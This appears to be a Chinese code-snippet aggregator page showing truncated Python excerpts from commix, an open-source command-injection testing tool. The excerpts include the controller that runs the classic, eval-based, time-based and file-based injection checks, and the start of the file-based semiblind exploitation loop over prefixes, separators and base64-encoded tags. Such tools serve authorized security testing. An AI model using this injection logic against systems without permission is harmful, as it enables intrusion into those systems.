    if len(check_parameter) != 0:
        check_parameter = " '" + check_parameter + "'"

    print "(*) Setting the " + "(" + http_request_method + ")" + check_parameter + header_name + the_type + "for tests."

    # Estimating the response time (in seconds)
    delay, url_time_response = requests.estimate_response_time(url, http_request_method, delay)

    # Check all injection techniques
    if not menu.options.tech:
        # Check if it is vulnerable to classic command injection technique.
        if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
            classic_state = True

        # Check if it is vulnerable to eval-based command injection technique.
        if eb_handler.exploitation(url, delay, filename, http_request_method) != False:
            eval_based_state = True

        # Check if it is vulnerable to time-based blind command injection technique.
        if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
            time_based_state = True

        # Check if it is vulnerable to file-based semiblind command injection technique.
        if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
            file_based_state = True

    else:
        # Check if it is vulnerable to classic command injection technique.
        if "classic" in menu.options.tech or len(menu.options.tech) <= 4 and "c" in menu.options.tech:
            # Check if classic results-based command injection technique succeeds.
            if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
                classic_state = True
        elif menu.options.tech == "classic":
            cb_handler.exploitation(url, delay, filename, http_request_method)
        else:
            classic_state = False

        # Check if it is vulnerable to eval-based command injection technique.
#.........这里部分代码省略.........
开发者ID:jack51706,项目名称:commix,代码行数:101,代码来源:controller.py


示例19: exploitation

def exploitation(url,delay,filename,http_request_method):

  counter = 0
  vp_flag = True
  no_result = True
  is_encoded= False
  stop_injection = False
  injection_type = "Semiblind-based Command Injection"
  technique = "file-based semiblind injection technique"
  
  sys.stdout.write( colors.BOLD + "(*) Testing the "+ technique + "... " + colors.RESET)
  sys.stdout.flush()
  
  # Print the findings to log file.
  output_file = open(filename + ".txt", "a")
  output_file.write("\n---")
  output_file.write("\n(+) Type : " + injection_type)
  output_file.write("\n(+) Technique : " + technique.title())
  output_file.close()
    
  for prefix in settings.PREFIXES:
    for suffix in settings.SUFFIXES:
      for seperator in settings.SEPERATORS:
	
	# Check for bad combination of prefix and seperator
	combination = prefix + seperator
	if combination in settings.JUNK_COMBINATION:
	  prefix = ""
	
	# Change TAG on every request to prevent false-positive resutls.
	TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))  
	
	# Check if defined "--base64" option.
	if menu.options.base64_trick == True:
	  B64_ENC_TAG = base64.b64encode(TAG)
	  B64_DEC_TRICK = settings.B64_DEC_TRICK
	else:
	  B64_ENC_TAG = TAG
	  B64_DEC_TRICK = ""
	  
	# The output  

鲜花

握手

雷人

路过

鸡蛋
该文章已有0人参与评论

请发表评论

全部评论

专题导读
上一篇:
Python parameters.do_POST_check函数代码示例发布时间:2022-05-27
下一篇:
Python headers.do_check函数代码示例发布时间:2022-05-27
热门推荐
阅读排行榜

扫描微信二维码

查看手机版网站

随时了解更新最新资讯

139-2527-9053

在线客服(服务时间 9:00~18:00)

在线QQ客服
地址:深圳市南山区西丽大学城创智工业园
电邮:jeky_zhao#qq.com
移动电话:139-2527-9053

Powered by 互联科技 X3.4© 2001-2213 极客世界.|Sitemap